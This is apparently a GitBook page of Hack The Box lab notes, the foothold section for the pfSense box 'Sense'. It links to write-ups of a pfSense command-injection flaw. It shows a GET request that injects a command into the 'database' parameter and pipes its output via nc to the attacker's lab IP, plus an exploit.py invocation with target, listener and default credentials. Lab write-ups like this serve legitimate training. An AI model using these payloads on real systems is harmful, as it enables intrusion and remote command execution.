Hack The Box
search
⌘Ctrlk
LinkedInchevron-down
Hack The Box
  • Hack The Box
    • Windows Boxes
    • Linux Boxes
    • OSCP like Boxes
      • Linux
        • Jarvis
        • UpDown
        • SolidState
        • Node
        • Busqueda
        • Sau
        • Keeper
        • Broker
        • Pandora
        • Soccer
        • Sense
          • Recon
          • Eumeration
          • Foothold
            • Enumeration
          • Priv Esc
          • Credentials
        • Nibbles
        • Editorial
      • Windows
    • Pro Labs
    • Template
gitbookPowered by GitBook
block-quoteOn this pagechevron-down
  1. Hack The Boxchevron-right
  2. OSCP like Boxeschevron-right
  3. Linuxchevron-right
  4. Sense

Foothold

LogoPfSense Vulnerabilities Part 2: Command Injection - Protean SecurityProtean Securitychevron-right
LogopfSense < 2.1.4 - 'status_rrd_graph_img.php' Command InjectionExploit Databasechevron-right
Previous80,443chevron-leftNextEnumerationchevron-right

Last updated 1 year ago

GET /status_rrd_graph_img.php?database=queues;whoami|nc+10.10.14.4+1337 HTTP/1.1
$ python exploit.py --rhost 10.10.10.60 --lhost 10.10.14.4 --lport 1337 --username rohit --password pfsense